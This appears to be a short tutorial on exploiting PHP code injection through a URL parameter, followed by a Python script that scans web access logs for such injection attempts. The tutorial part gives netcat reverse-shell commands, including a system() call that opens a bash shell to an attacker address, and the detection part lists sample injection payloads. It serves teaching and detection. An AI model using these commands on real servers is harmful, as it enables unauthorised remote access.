PHP Code Injection
PHP code injection is a vulnerability that allows an attacker to inject custom code into the server-side scripting engine.
Tools we will be using
If we click on the message, it echoes data back, so we know the PHP code is executing correctly.
We can also see this in the URL, with the message parameter.
We can change the echoed message; however, if we try other data such as HTML tags (HTML injection), we get no output.
So we have established that the message is being processed by the server.
If we insert a PHP statement terminator (semicolon), we can execute more commands with the PHP system call.
A great way of taking advantage of PHP code injection is by using the system call.
Getting a reverse shell
- Set up a netcat listener: nc -nvlp 1234
- Execute nc with the system call: system("nc 192.168.1.101 1234 -e /bin/bash");
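The requests described above leave a recognizable trace in the web server's access log: a parameter whose decoded value contains a statement terminator followed by a function call. The following detection sketch is an added example, not code from the original post; the combined log format, the `/page.php` path, the client address and the list of flagged PHP functions are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# PHP functions that run OS commands or evaluate code; a call to one of these
# inside a request parameter is a strong sign of a code injection attempt.
DANGEROUS_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)
# A statement terminator followed by another function call, e.g. "a;phpinfo()".
CHAINED_CALL = re.compile(r";\s*[A-Za-z_]\w*\s*\(")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(log_line):
    """Return [(param, decoded_value, reason)] for one access log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    findings = []
    # parse_qsl percent-decodes names and values. separator="&" keeps a ';'
    # in the payload from being treated as a parameter delimiter.
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True, separator="&"):
        if DANGEROUS_CALL.search(value):
            findings.append((name, value, "dangerous PHP function call"))
        elif CHAINED_CALL.search(value):
            findings.append((name, value, "statement terminator followed by a call"))
    return findings


# Constructed sample log lines (hypothetical path and client address).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /page.php?message=test HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /page.php?message=%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 498',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /page.php?message=test%3B%20system(%22id%22) HTTP/1.1" 200 540',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /page.php?message=a%3Bphpinfo%28%29 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value, reason in suspicious_params(line):
            print(f"ALERT {reason}: {name}={value!r}")
```

This only inspects query strings, so payloads sent in a POST body need the same check applied wherever request bodies are logged.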